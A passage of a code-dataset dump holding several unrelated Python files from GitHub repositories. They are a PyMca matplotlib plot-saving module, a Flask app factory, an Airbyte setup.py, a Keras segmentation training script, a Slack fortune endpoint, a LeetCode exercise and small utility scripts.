style = linestyle\n\n if linewidth is None:linewidth = 1.0\n self._axFunction( x, y, linestyle = style, color=color, linewidth = linewidth, **kw)\n self._dataCounter += 1\n if legend is None:\n #legend = \"%02d\" % self._dataCounter #01, 02, 03, ...\n legend = \"%c\" % (96+self._dataCounter) #a, b, c, ..\n self._legendList.append(legend)\n\n def setXLabel(self, label):\n self.ax.set_xlabel(label)\n\n def setYLabel(self, label):\n self.ax.set_ylabel(label)\n\n def setTitle(self, title):\n self.ax.set_title(title)\n\n def plotLegends(self):\n if not self._legend:return\n if not len(self._legendList):return\n loc = (1.01, 0.0)\n labelsep = 0.015\n drawframe = True\n fontproperties = FontProperties(size=10)\n if len(self._legendList) > 14:\n drawframe = False\n if matplotlib_version < '0.99.0':\n fontproperties = FontProperties(size=8)\n loc = (1.05, -0.2)\n else:\n if len(self._legendList) < 18:\n #drawframe = True\n loc = (1.01, 0.0)\n elif len(self._legendList) < 25:\n loc = (1.05, 0.0)\n fontproperties = FontProperties(size=8)\n elif len(self._legendList) < 28:\n loc = (1.05, 0.0)\n fontproperties = FontProperties(size=6)\n else:\n loc = (1.05, -0.1)\n fontproperties = FontProperties(size=6)\n\n if matplotlib_version < '0.99.0':\n legend = self.ax.legend(self._legendList,\n loc = loc,\n prop = fontproperties,\n labelsep = labelsep,\n pad = 0.15)\n else:\n legend = self.ax.legend(self._legendList,\n loc = loc,\n prop = fontproperties,\n labelspacing = labelsep,\n borderpad = 0.15)\n legend.draw_frame(drawframe)\n\n\n def saveFile(self, filename, format=None):\n if format is None:\n format = filename[-3:]\n\n if format.upper() not in ['EPS', 'PNG', 'SVG']:\n raise ValueError(\"Unknown format %s\" % format)\n\n if os.path.exists(filename):\n os.remove(filename)\n\n if self.limitsSet:\n self.ax.set_ylim(self.ymin, self.ymax)\n self.ax.set_xlim(self.xmin, self.xmax)\n #self.plotLegends()\n self.print_figure(filename)\n return\n\nclass PyMcaMatplotlibSaveImage:\n def __init__(self, imageData=None, fileName=None,\n dpi=300,\n size=(5, 5),\n xaxis='off',\n yaxis='off',\n xlabel='',\n ylabel='',\n nxlabels=0,\n nylabels=0,\n colorbar=None,\n title='',\n interpolation='nearest',\n colormap=None,\n linlogcolormap='linear',\n origin='lower',\n contour='off',\n contourlabels='on',\n contourlabelformat='%.3f',\n contourlevels=10,\n contourlinewidth=10,\n xorigin=0.0,\n yorigin=0.0,\n xpixelsize=1.0,\n ypixelsize=1.0,\n xlimits=None,\n ylimits=None,\n vlimits=None,\n extent=None):\n\n self.figure = Figure(figsize=size) #in inches\n self.canvas = FigureCanvas(self.figure)\n self.imageData = imageData\n self.pixmapImage = None\n self.config={'xaxis':xaxis,\n 'yaxis':yaxis,\n 'title':title,\n 'xlabel':xlabel,\n 'ylabel':ylabel,\n 'nxlabels':nxlabels,\n 'nylabels':nylabels,\n 'colorbar':colorbar,\n 'colormap':colormap,\n 'linlogcolormap':linlogcolormap,\n 'interpolation':interpolation,\n 'origin':origin,\n 'contour':contour,\n 'contourlabels':contourlabels,\n 'contourlabelformat':contourlabelformat,\n 'contourlevels':contourlevels,\n 'contourlinewidth':contourlinewidth,\n 'xpixelsize':xpixelsize,\n 'ypixelsize':ypixelsize,\n 'xorigin':xorigin,\n 'yorigin':yorigin,\n 'zoomxmin':None,\n 'zoomxmax':None,\n 'zoomymin':None,\n 'zoomymax':None,\n 'valuemin':None,\n 'valuemax':None,\n 'xlimits':xlimits,\n 'ylimits':ylimits,\n 'vlimits':vlimits,\n 'extent':extent}\n\n #generate own colormaps\n cdict = {'red': ((0.0, 0.0, 0.0),\n (1.0, 1.0, 1.0)),\n 'green': ((0.0, 0.0, 0.0),\n (1.0, 0.0, 0.0)),\n 'blue': ((0.0, 0.0, 0.0),\n (1.0, 0.0, 0.0))}\n self.__redCmap = LinearSegmentedColormap('red',cdict,256)\n\n cdict = {'red': ((0.0, 0.0, 0.0),\n (1.0, 0.0, 0.0)),\n 'green': ((0.0, 0.0, 0.0),\n (1.0, 1.0, 1.0)),\n 'blue': ((0.0, 0.0, 0.0),\n (1.0, 0.0, 0.0))}\n self.__greenCmap = LinearSegmentedColormap('green',cdict,256)\n\n cdict = {'red': ((0.0, 0.0, 0.0),\n (1.0, 0.0, 0.0)),\n 'green': ((0.0, 0.0, 0.0),\n (1.0, 0.0, 0.0)),\n 'blue': ((0.0, 0.0, 0.0),\n (1.0, 1.0, 1.0))}\n self.__blueCmap = LinearSegmentedColormap('blue',cdict,256)\n\n # Temperature as defined in spslut\n cdict = {'red': ((0.0, 0.0, 0.0),\n (0.5, 0.0, 0.0),\n (0.75, 1.0, 1.0),\n (1.0, 1.0, 1.0)),\n 'green': ((0.0, 0.0, 0.0),\n (0.25, 1.0, 1.0),\n (0.75, 1.0, 1.0),\n (1.0, 0.0, 0.0)),\n 'blue': ((0.0, 1.0, 1.0),\n (0.25, 1.0, 1.0),\n (0.5, 0.0, 0.0),\n (1.0, 0.0, 0.0))}\n\n #Do I really need as many colors?\n self.__temperatureCmap = LinearSegmentedColormap('temperature',\n cdict, 65536)\n\n #reversed gray\n cdict = {'red': ((0.0, 1.0, 1.0),\n (1.0, 0.0, 0.0)),\n 'green': ((0.0, 1.0, 1.0),\n (1.0, 0.0, 0.0)),\n 'blue': ((0.0, 1.0, 1.0),\n (1.0, 0.0, 0.0))}\n\n self.__reversedGrayCmap = LinearSegmentedColormap('yerg', cdict, 256)\n\n if fileName is not None:\n self.saveImage(fileName)\n\n def setImage(self, image=None):\n self.imageData = image\n\n def setParameters(self, ddict):\n self.config.update(ddict)\n\n def saveImage(self, filename):\n self.figure.clear()\n if (self.imageData is None) and\\\n (self.pixmapImage is None):\n return\n # The axes\n self.axes = self.figure.add_axes([.15, .15, .75, .8])\n if self.config['xaxis'] == 'off':\n self.axes.xaxis.set_visible(False)\n else:\n self.axes.xaxis.set_visible(True)\n nLabels = self.config['nxlabels']\n if nLabels not in ['Auto', 'auto', '0', 0]:\n self.axes.xaxis.set_major_locator(MaxNLocator(nLabels))\n else:\n self.axes.xaxis.set_major_locator(AutoLocator())\n if self.config['yaxis'] == 'off':\n self.axes.yaxis.set_visible(False)\n else:\n self.axes.yaxis.set_visible(True)\n if nLabels not in ['Auto', 'auto', '0', 0]:\n self.axes.yaxis.set_major_locator(MaxNLocator(nLabels))\n else:\n self.axes.yaxis.set_major_locator(AutoLocator())\n\n if self.pixmapImage is not None:\n self._savePixmapFigure(filename)\n return\n\n interpolation = self.config['interpolation']\n origin = self.config['origin']\n\n cmap = self.__temperatureCmap\n ccmap = cm.gray\n if self.config['colormap'] in ['grey','gray']:\n cmap = cm.gray\n ccmap = self.__temperatureCmap\n elif self.config['colormap'] in ['yarg','yerg']:\n cmap = self.__reversedGrayCmap\n ccmap = self.__temperatureCmap\n elif self.config['colormap']=='jet':\n cmap = cm.jet\n elif self.config['colormap']=='hot':\n cmap = cm.hot\n elif self.config['colormap']=='cool':\n cmap = cm.cool\n elif self.config['colormap']=='copper':\n cmap = cm.copper\n elif self.config['colormap']=='spectral':\n cmap = cm.spectral\n elif self.config['colormap']=='hsv':\n cmap = cm.hsv\n elif self.config['colormap']=='rainbow':\n cmap = cm.gist_rainbow\n elif self.config['colormap']=='red':\n cmap = self.__redCmap\n elif self.config['colormap']=='green':\n cmap = self.__greenCmap\n elif self.config['colormap']=='blue':\n cmap = self.__blueCmap\n elif self.config['colormap']=='temperature':\n cmap = self.__temperatureCmap\n elif self.config['colormap'] == 'paired':\n cmap = cm.Paired\n elif self.config['colormap'] == 'paired_r':\n cmap = cm.Paired_r\n elif self.config['colormap'] == 'pubu':\n cmap = cm.PuBu\n elif self.config['colormap'] == 'pubu_r':\n cmap = cm.PuBu_r\n elif self.config['colormap'] == 'rdbu':\n cmap = cm.RdBu\n elif self.config['colormap'] == 'rdbu_r':\n cmap = cm.RdBu_r\n elif self.config['colormap'] == 'gist_earth':\n cmap = cm.gist_earth\n elif self.config['colormap'] == 'gist_earth_r':\n cmap = cm.gist_earth_r\n elif self.config['colormap'] == 'blues':\n cmap = cm.Blues\n elif self.config['colormap'] == 'blues_r':\n cmap = cm.Blues_r\n elif self.config['colormap'] == 'ylgnbu':\n cmap = cm.YlGnBu\n elif self.config['colormap'] == 'ylgnbu_r':\n cmap = cm.YlGnBu_r\n else:\n _logger.warning(\"Unsupported colormap %s\", self.config['colormap'])\n _logger.warning(\"Defaulting to grayscale.\")\n\n if self.config['extent'] is None:\n h, w = self.imageData.shape\n x0 = self.config['xorigin']\n y0 = self.config['yorigin']\n w = w * self.config['xpixelsize']\n h = h * self.config['ypixelsize']\n if origin == 'upper':\n extent = (x0, w+x0,\n h+y0, y0)\n else:\n extent = (x0, w+x0,\n y0, h+y0)\n else:\n extent = self.config['extent']\n\n vlimits = self.__getValueLimits()\n if vlimits is None:\n imageData = self.imageData\n vmin = self.imageData.min()\n vmax = self.imageData.max()\n else:\n vmin = min(vlimits[0], vlimits[1])\n vmax = max(vlimits[0], vlimits[1])\n imageData = self.imageData.clip(vmin,vmax)\n\n if self.config['linlogcolormap'] != 'linear':\n if vmin <= 0:\n if vmax > 0:\n vmin = min(imageData[imageData>0])\n else:\n vmin = 0.0\n vmax = 1.0\n self._image = self.axes.imshow(imageData.clip(vmin,vmax),\n interpolation=interpolation,\n origin=origin,\n cmap=cmap,\n extent=extent,\n norm=LogNorm(vmin, vmax))\n else:\n self._image = self.axes.imshow(imageData,\n interpolation=interpolation,\n origin=origin,\n cmap=cmap,\n extent=extent,\n norm=Normalize(vmin, vmax))\n\n ylim = self.axes.get_ylim()\n\n if self.config['colorbar'] is not None:\n barorientation = self.config['colorbar']\n self._colorbar = self.figure.colorbar(self._image,\n orientation=barorientation)\n\n #contour plot\n if self.config['contour'] != 'off':\n dataMin = imageData.min()\n dataMax = imageData.max()\n ncontours = int(self.config['contourlevels'])\n contourlinewidth = int(self.config['contourlinewidth'])/10.\n levels = (numpy.arange(ncontours)) *\\\n (dataMax - dataMin)/float(ncontours)\n if self.config['contour'] == 'filled':\n self._contour = self.axes.contourf(imageData, levels,\n origin=origin,\n cmap=ccmap,\n extent=extent)\n else:\n self._contour = self.axes.contour(imageData, levels,\n origin=origin,\n cmap=ccmap,\n linewidths=contourlinewidth,\n extent=extent)\n if self.config['contourlabels'] != 'off':\n self.axes.clabel(self._contour, fontsize=9,\n inline=1, fmt=self.config['contourlabelformat'])\n if 0 and self.config['colorbar'] is not None:\n if barorientation == 'horizontal':\n barorientation = 'vertical'\n else:\n barorientation = 'horizontal'\n self._ccolorbar=self.figure.colorbar(self._contour,\n orientation=barorientation,\n extend='both')\n\n self.__postImage(ylim, filename)\n\n\n def setPixmapImage(self, image=None, bgr=False):\n if bgr:\n self.pixmapImage = image * 1\n self.pixmapImage[:,:,0] = image[:,:,2]\n self.pixmapImage[:,:,2] = image[:,:,0]\n else:\n self.pixmapImage = image\n\n def _savePixmapFigure(self, filename):\n interpolation = self.config['interpolation']\n origin = self.config['origin']\n if self.config['extent'] is None:\n h= self.pixmapImage.shape[0]\n w= self.pixmapImage.shape[1]\n x0 = self.config['xorigin']\n y0 = self.config['yorigin']\n w = w * self.config['xpixelsize']\n h = h * self.config['ypixelsize']\n if origin == 'upper':\n extent = (x0, w+x0,\n h+y0, y0)\n else:\n extent = (x0, w+x0,\n y0, h+y0)\n else:\n extent = self.config['extent']\n self._image = self.axes.imshow(self.pixmapImage,\n interpolation=interpolation,\n origin=origin,\n extent=extent)\n\n ylim = self.axes.get_ylim()\n self.__postImage(ylim, filename)\n\n def __getValueLimits(self):\n if (self.config['valuemin'] is not None) and\\\n (self.config['valuemax'] is not None) and\\\n (self.config['valuemin'] != self.config['valuemax']):\n vlimits = (self.config['valuemin'],\n self.config['valuemax'])\n elif self.config['vlimits'] is not None:\n vlimits = self.config['vlimits']\n else:\n vlimits = None\n return vlimits\n\n def __postImage(self, ylim, filename):\n self.axes.set_title(self.config['title'])\n self.axes.set_xlabel(self.config['xlabel'])\n self.axes.set_ylabel(self.config['ylabel'])\n\n origin = self.config['origin']\n if (self.config['zoomxmin'] is not None) and\\\n (self.config['zoomxmax'] is not None)and\\\n (self.config['zoomxmax'] != self.config['zoomxmin']):\n xlimits = (self.config['zoomxmin'],\n self.config['zoomxmax'])\n elif self.config['xlimits'] is not None:\n xlimits = self.config['xlimits']\n else:\n xlimits = None\n\n if (self.config['zoomymin'] is not None) and\\\n (self.config['zoomymax'] is not None) and\\\n (self.config['zoomymax'] != self.config['zoomymin']):\n ylimits = (self.config['zoomymin'],\n self.config['zoomymax'])\n elif self.config['ylimits'] is not None:\n ylimits = self.config['ylimits']\n else:\n ylimits = None\n\n if ylimits is None:\n self.axes.set_ylim(ylim[0],ylim[1])\n else:\n ymin = min(ylimits)\n ymax = max(ylimits)\n if origin == \"lower\":\n self.axes.set_ylim(ymin, ymax)\n else:\n self.axes.set_ylim(ymax, ymin)\n\n if xlimits is not None:\n xmin = min(xlimits)\n xmax = max(xlimits)\n self.axes.set_xlim(xmin, xmax)\n\n self.canvas.print_figure(filename)\n\n\nif __name__ == \"__main__\":\n import sys\n if len(sys.argv) < 2:\n a=numpy.arange(1200.)\n a.shape = 20, 60\n PyMcaMatplotlibSaveImage(a, \"filename.png\", colormap=\"rainbow\")\n print(\"Image filename.png saved\")\n else:\n w=PyMcaMatplotlibSave(legends=True)\n x = numpy.arange(1200.)\n w.setLimits(0, 1200., 0, 12000.)\n if len(sys.argv) > 2:\n n = int(sys.argv[2])\n else:\n n = 14\n for i in range(n):\n y = x * i\n w.addDataToPlot(x,y, legend=\"%d\" % i)\n #w.setTitle('title')\n w.setXLabel('Channel')\n w.setYLabel('Counts')\n w.plotLegends()\n w.saveFile(\"filename.png\")\n print(\"Plot filename.png saved\")\n sys.exit(0)\n\n","repo_name":"vasole/pymca","sub_path":"PyMca5/PyMcaCore/PyMcaMatplotlibSave.py","file_name":"PyMcaMatplotlibSave.py","file_ext":"py","file_size_in_byte":23510,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"35"} +{"seq_id":"13111445442","text":"from flask import Flask\nfrom os import getenv\nfrom flask_mysqldb import MySQL\nfrom config import CLOUD_NAME, API_KEY, API_SECRET\nimport cloudinary\n\nmysql = MySQL()\n\n\ndef create_app():\n app = Flask(__name__)\n app.config['SECRET_KEY'] = getenv('SECRET_KEY')\n app.config['MYSQL_HOST'] = getenv('DB_HOST')\n app.config['MYSQL_USER'] = getenv('DB_USERNAME')\n app.config['MYSQL_PASSWORD'] = getenv('DB_PASSWORD')\n app.config['MYSQL_DB'] = getenv('DB_NAME')\n mysql.init_app(app)\n cloudinary.config(\n cloud_name=CLOUD_NAME,\n api_key=API_KEY,\n api_secret=API_SECRET,)\n\n\n\n if __name__ == '__main__':\n app.run(debug=True)\n\n\n from .webapp import home, program, student, college, course\n\n app.register_blueprint(home, url_prefix='/')\n app.register_blueprint(program, url_prefix='/')\n app.register_blueprint(student, url_prefix='/')\n app.register_blueprint(college, url_prefix='/')\n app.register_blueprint(course, url_prefix='/')\n\n return app","repo_name":"rossallyn/STUDENT-MANAGEMENT-SYSTEM-","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20203143461","text":"from setuptools import find_packages, setup\n\nMAIN_REQUIREMENTS = [\"airbyte-cdk\", \"PyJWT==2.4.0\", \"cryptography==37.0.4\", \"requests\", \"pandas\"]\n\nTEST_REQUIREMENTS = [\n \"freezegun\",\n \"pytest~=6.1\",\n \"pytest-mock~=3.6.1\",\n \"requests-mock\",\n]\n\nsetup(\n name=\"source_google_analytics_data_api\",\n description=\"Source implementation for Google Analytics Data Api.\",\n author=\"Airbyte\",\n author_email=\"contact@airbyte.io\",\n packages=find_packages(),\n install_requires=MAIN_REQUIREMENTS,\n package_data={\"\": [\"*.json\", \"schemas/*.json\"]},\n extras_require={\n \"tests\": TEST_REQUIREMENTS,\n },\n)\n","repo_name":"airbytehq/airbyte","sub_path":"airbyte-integrations/connectors/source-google-analytics-data-api/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":12323,"dataset":"github-code","pt":"35"} +{"seq_id":"41287713251","text":"import shutil\nimport os\nimport random\nimport numpy as np\nimport yaml\nfrom pathlib import Path\nfrom datetime import datetime\nimport pytz\nimport matplotlib.pyplot as plt\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, CSVLogger\nfrom image_utils import TensorBoardImage, ImagesAndMasksGenerator, trainGenerator\nimport git\nfrom gcp_utils import copy_folder_locally_if_missing\nfrom models import generate_compiled_segmentation_model\n\n\nmetadata_file_name = 'metadata.yaml'\ntmp_directory = Path('./tmp')\n\n\ndef sample_image_and_mask_paths(generator, n_paths):\n random.seed(0)\n rand_inds = [random.randint(0, len(generator.image_filenames)-1) for _ in range(n_paths)]\n image_paths = list(np.asarray(generator.image_filenames)[rand_inds])\n mask_paths = list(np.asarray(generator.mask_filenames)[rand_inds])\n # mask_paths = [{c: list(np.asarray(generator.mask_filenames[c]))[i] for c in generator.mask_filenames} for i in rand_inds]\n return list(zip(image_paths, mask_paths))\n\n\ndef train(gcp_bucket, config_file):\n\n start_dt = datetime.now()\n\n with Path(config_file).open('r') as f:\n train_config = yaml.safe_load(f)['train_config']\n\n assert \"gs://\" in gcp_bucket\n\n # clean up the tmp directory\n try:\n shutil.rmtree(tmp_directory.as_posix())\n except FileNotFoundError:\n pass\n tmp_directory.mkdir()\n\n local_dataset_dir = Path(tmp_directory, 'datasets')\n\n copy_folder_locally_if_missing(os.path.join(gcp_bucket, 'datasets', train_config['dataset_id']),\n local_dataset_dir)\n\n model_id = \"{}_{}\".format(train_config['model_id_prefix'], datetime.now(pytz.UTC).strftime('%Y%m%dT%H%M%SZ'))\n model_dir = Path(tmp_directory, 'models', model_id)\n model_dir.mkdir(parents=True)\n\n plots_dir = Path(model_dir, 'plots')\n plots_dir.mkdir(parents=True)\n\n logs_dir = Path(model_dir, 'logs')\n logs_dir.mkdir(parents=True)\n\n with Path(local_dataset_dir, train_config['dataset_id'], 'config.yaml').open('r') as f:\n dataset_config = yaml.safe_load(f)['dataset_config']\n\n with Path(model_dir, 'config.yaml').open('w') as f:\n yaml.safe_dump({'train_config': train_config}, f)\n\n target_size = dataset_config['target_size']\n batch_size = train_config['batch_size']\n epochs = train_config['epochs']\n augmentation_type = train_config['data_augmentation']['augmentation_type']\n\n if augmentation_type == 'necstlab': # necstlab's workflow\n train_generator = ImagesAndMasksGenerator(\n Path(local_dataset_dir, train_config['dataset_id'], 'train').as_posix(),\n rescale=1./255,\n target_size=target_size,\n batch_size=batch_size,\n shuffle=True,\n random_rotation=train_config['data_augmentation']['necstlab_augmentation']['random_90-degree_rotations'],\n seed=train_config['training_data_shuffle_seed'])\n\n validation_generator = ImagesAndMasksGenerator(\n Path(local_dataset_dir, train_config['dataset_id'],\n 'validation').as_posix(),\n rescale=1./255,\n target_size=target_size,\n batch_size=batch_size)\n elif augmentation_type == 'bio': # new workflow\n bio_augmentation = train_config['data_augmentation']['bio_augmentation']\n augmentation_dict = dict(rotation_range=bio_augmentation['rotation_range'],\n width_shift_range=bio_augmentation['width_shift_range'],\n height_shift_range=bio_augmentation['height_shift_range'],\n shear_range=bio_augmentation['shear_range'],\n zoom_range=bio_augmentation['zoom_range'],\n horizontal_flip=bio_augmentation['horizontal_flip'],\n fill_mode=bio_augmentation['fill_mode'],\n cval=0)\n train_generator = trainGenerator(\n batch_size=batch_size,\n train_path=Path(local_dataset_dir, train_config['dataset_id'], 'train').as_posix(),\n image_folder='images',\n mask_folder='masks',\n aug_dict=augmentation_dict,\n target_size=target_size,\n seed=train_config['training_data_shuffle_seed'])\n\n validation_generator = trainGenerator(\n batch_size=batch_size,\n train_path=Path(local_dataset_dir, train_config['dataset_id'], 'validation').as_posix(),\n image_folder='images',\n mask_folder='masks',\n aug_dict=augmentation_dict,\n target_size=target_size,\n seed=train_config['training_data_shuffle_seed'])\n\n compiled_model = generate_compiled_segmentation_model(\n train_config['segmentation_model']['model_name'],\n train_config['segmentation_model']['model_parameters'],\n 1,\n train_config['loss'],\n train_config['optimizer'])\n\n model_checkpoint_callback = ModelCheckpoint(Path(model_dir, 'model.hdf5').as_posix(),\n monitor='loss', verbose=1, save_best_only=True)\n tensorboard_callback = TensorBoard(log_dir=logs_dir.as_posix(), batch_size=batch_size, write_graph=True,\n write_grads=False, write_images=True, update_freq='epoch')\n\n # n_sample_images = 20\n # train_image_and_mask_paths = sample_image_and_mask_paths(train_generator, n_sample_images)\n # validation_image_and_mask_paths = sample_image_and_mask_paths(validation_generator, n_sample_images)\n\n # tensorboard_image_callback = TensorBoardImage(\n # log_dir=logs_dir.as_posix(),\n # images_and_masks_paths=train_image_and_mask_paths + validation_image_and_mask_paths)\n\n csv_logger_callback = CSVLogger(Path(model_dir, 'metrics.csv').as_posix(), append=True)\n\n results = compiled_model.fit_generator(\n train_generator,\n steps_per_epoch=len(train_generator) if augmentation_type == 'necstlab' else train_config['data_augmentation']['bio_augmentation']['steps_per_epoch'],\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=len(validation_generator) if augmentation_type == 'necstlab' else train_config['data_augmentation']['bio_augmentation']['validation_steps'],\n callbacks=[model_checkpoint_callback, tensorboard_callback, csv_logger_callback])\n\n metric_names = ['loss'] + [m.name for m in compiled_model.metrics]\n\n for metric_name in metric_names:\n\n fig, ax = plt.subplots()\n for split in ['train', 'validate']:\n\n key_name = metric_name\n if split == 'validate':\n key_name = 'val_' + key_name\n\n ax.plot(range(epochs), results.history[key_name], label=split)\n ax.set_xlabel('epochs')\n if metric_name == 'loss':\n ax.set_ylabel(compiled_model.loss.__name__)\n else:\n ax.set_ylabel(metric_name)\n ax.legend()\n if metric_name == 'loss':\n fig.savefig(Path(plots_dir, compiled_model.loss.__name__ + '.png').as_posix())\n else:\n fig.savefig(Path(plots_dir, metric_name + '.png').as_posix())\n\n # mosaic plot\n fig2, axes = plt.subplots(nrows=2, ncols=3, figsize=(10, 6))\n counter_m = 0\n counter_n = 0\n for metric_name in metric_names:\n\n for split in ['train', 'validate']:\n\n key_name = metric_name\n if split == 'validate':\n key_name = 'val_' + key_name\n\n axes[counter_m, counter_n].plot(range(epochs), results.history[key_name], label=split)\n axes[counter_m, counter_n].set_xlabel('epochs')\n if metric_name == 'loss':\n axes[counter_m, counter_n].set_ylabel(compiled_model.loss.__name__)\n else:\n axes[counter_m, counter_n].set_ylabel(metric_name)\n axes[counter_m, counter_n].legend()\n\n counter_n += 1\n if counter_n == 3: # 3 plots per row\n counter_m += 1\n counter_n = 0\n\n fig2.tight_layout()\n fig2.delaxes(axes[1][2])\n fig2.savefig(Path(plots_dir, 'metrics_mosaic.png').as_posix())\n\n metadata = {\n 'gcp_bucket': gcp_bucket,\n 'created_datetime': datetime.now(pytz.UTC).strftime('%Y%m%dT%H%M%SZ'),\n 'num_classes': 1,\n 'target_size': target_size,\n 'git_hash': git.Repo(search_parent_directories=True).head.object.hexsha,\n 'original_config_filename': config_file,\n 'elapsed_minutes': round((datetime.now() - start_dt).total_seconds() / 60, 1),\n 'dataset_config': dataset_config,\n 'train_config': train_config\n }\n\n with Path(model_dir, metadata_file_name).open('w') as f:\n yaml.safe_dump(metadata, f)\n\n os.system(\"gsutil -m cp -r '{}' '{}'\".format(Path(tmp_directory, 'models').as_posix(), gcp_bucket))\n\n shutil.rmtree(tmp_directory.as_posix())\n\n\nif __name__ == \"__main__\":\n import argparse\n import sys\n\n argparser = argparse.ArgumentParser(sys.argv[0])\n argparser.add_argument(\n '--gcp-bucket',\n type=str,\n help='The GCP bucket where the prepared data is located and to use to store the trained model.')\n argparser.add_argument(\n '--config-file',\n type=str,\n help='The location of the train configuration file.')\n\n train(**argparser.parse_args().__dict__)\n","repo_name":"ggoom/necstlab-damage-segmentation","sub_path":"train_segmentation_model.py","file_name":"train_segmentation_model.py","file_ext":"py","file_size_in_byte":9371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28420547388","text":"\"\"\"Misc utilities!\"\"\"\nimport os\nfrom flask import Blueprint, request\nfrom labbot.controllers import utils\n\nmisc = Blueprint('misc', __name__, template_folder='templates/misc')\n@misc.route('/misc', defaults={'page': 'index'})\n@misc.route('/misc/index', methods=['POST'])\ndef index():\n \"\"\"Blank index page, still don't know why\"\"\"\n\n@misc.route('/misc/fortune', methods=['POST'])\ndef fortune():\n \"\"\"Get fortune\n \"\"\"\n utils.validate_token(request.form.get('token', None))\n\n #channel = request.form.get('channel_id', None)\n #text = request.form.get('text', None)\n\n fortune_str = os.popen('fortune').read()\n print(fortune_str)\n #str(fortune_str)\n #print(type(fortune_str))\n return fortune_str\n","repo_name":"jmacego/labbot","sub_path":"labbot/controllers/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35761000684","text":"# num = [1, 1]\r\n#\r\n# c=0\r\n#\r\n# for i in range(len(num) - 1):\r\n# if num[i]!=num[i + 1]:\r\n# num[c]=num[i]\r\n# num[i]=\"None\"\r\n# # num_len+=1\r\n# c+=1\r\n# if i == len(num)-2:\r\n# num[c] = num[i]\r\n# num[c] = num[i + 1]\r\n# # num_len+=1\r\n# num[i+1]=\"None\"\r\n# elif num[i]==num[i+1]:\r\n# num[i]=\"None\"\r\n# num_len=0\r\n# for i in num:\r\n# if i==\"None\":\r\n# num_len+=1\r\n# print(num_len)\r\n# print(num)\r\n\r\nnums = [1, 1, 2]\r\nc=0\r\n# for i in range(len(num)-1):\r\n# if num[i]==num[i+1]:\r\n# continue\r\n# elif num[i]!=num[i+1]:\r\n# c += 1\r\n# print(c)\r\n# num[c] = num[i]\r\n#\r\n# print(c+1)\r\n# print(num)\r\n# if len(nums) == 0:\r\n# return 0\r\nindex = 0\r\nfor i in range(1, len(nums)):\r\n if nums[i] != nums[index]:\r\n index += 1\r\n nums[index] = nums[i]\r\n print(nums)\r\n print (index+ 1)","repo_name":"Khushi-Jaiswal-2003/Leetcode","sub_path":"26. Remove Duplicates from Sorted Array.py","file_name":"26. Remove Duplicates from Sorted Array.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"38310647243","text":"#jsonthingy\r\n\r\nfrom sentscript import *\r\nfrom sentimentDictionary import *\r\nimport json\r\nimport os\r\n\r\nDATA_PATH = os.getcwd()+ '/'\r\nkeywordFile = ''\r\n\r\n#write data\r\n\r\ncurrent = open(DATA_PATH+'keyword.txt', 'r+').read()\r\nif current != keywordFile:\r\n print(current)\r\n rv = '[Date, Values]'\r\n new_values = (searchFunction(current))\r\n with open(DATA_PATH + \"dump.csv\", \"w\") as outfile:\r\n if type(new_values) == float:\r\n json.dump(new_values,outfile)\r\n else:\r\n outfile.write(rv+'\\n')\r\n for key in new_values:\r\n json.dump(str([dateChanger(key),new_values[key]]), outfile, indent=2)\r\n outfile.write('\\n')\r\n keywordFile = current\r\n\r\n#clean data\r\n\r\nwith open(DATA_PATH + \"dump.csv\", \"r+\") as outfile:\r\n\tinPut = outfile.read()\r\n\toutPut = ''\r\n\tfor i in range(len(inPut)):\r\n\t\tif inPut[i] not in ['\"', '[', ']', \"'\"]:\r\n\t\t\toutPut += inPut[i]\r\n\r\n#rewrite data\r\nwith open(DATA_PATH + \"dump.csv\", \"w\") as outfile:\r\n\toutfile.write(outPut)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# # keyword = json.load(asdflkja;sdkfj; keyword)\r\n# # json.dump(searchFunction(keyword))\r\n\r\n# bulkData = searchFunction('one')\r\n\r\n# import httplib,json,urllib\r\n# headers = { \"charset\":\"utf-8\", \"Accept\": \"text/plain\"}\r\n# conn = httplib.HTTPConnection(\"localhost\")\r\n# #converting list to a json stream\r\n# bulkData = json.dumps(bulkData, ensure_ascii = 'False')\r\n# # ensure_ascii is false as data is in unicode and not ascii encoding , use this if data is in any other encoding\r\n# postData = urllib.urlencode({'results':bulkData})\r\n# conn.request(\"POST\", \"/getresult.php\", postData,headers)\r\n# # response = conn.getresponse()\r\n# # text = response.read()\r\n# # print (response.status,text)\r\n# # conn.close()\r\n\r\n","repo_name":"muruvig/angelhack","sub_path":"jsonthingy.py","file_name":"jsonthingy.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"13638623478","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 18 22:47:17 2022\n\n@author: tungchentsai\n\"\"\"\n\nABS_WATCH_PATH = r\"~/Documents/GitHub/sftp-sync/tests/test_folder/\"\nIGNORE_PATTERNS = ['.DS_Store', '.ds_store']\n\nimport os\n\n\ndef run_module(module_name, *args):\n arguments = ' '.join(args)\n command = f'python -m {module_name} {arguments}'\n \n original_working_directory = os.getcwd()\n try:\n os.chdir(r\"..\") # parent directory of sftp_sync package\n print(f'Working directory was changed to {os.getcwd()}')\n os.system(command)\n finally:\n os.chdir(original_working_directory)\n print(f'Working directory was changed back to {os.getcwd()}')\n\n\nif __name__ == \"__main__\":\n watch_module = 'watch'\n watch_path = os.path.realpath(os.path.expanduser(ABS_WATCH_PATH))\n \n run_module(watch_module, watch_path, 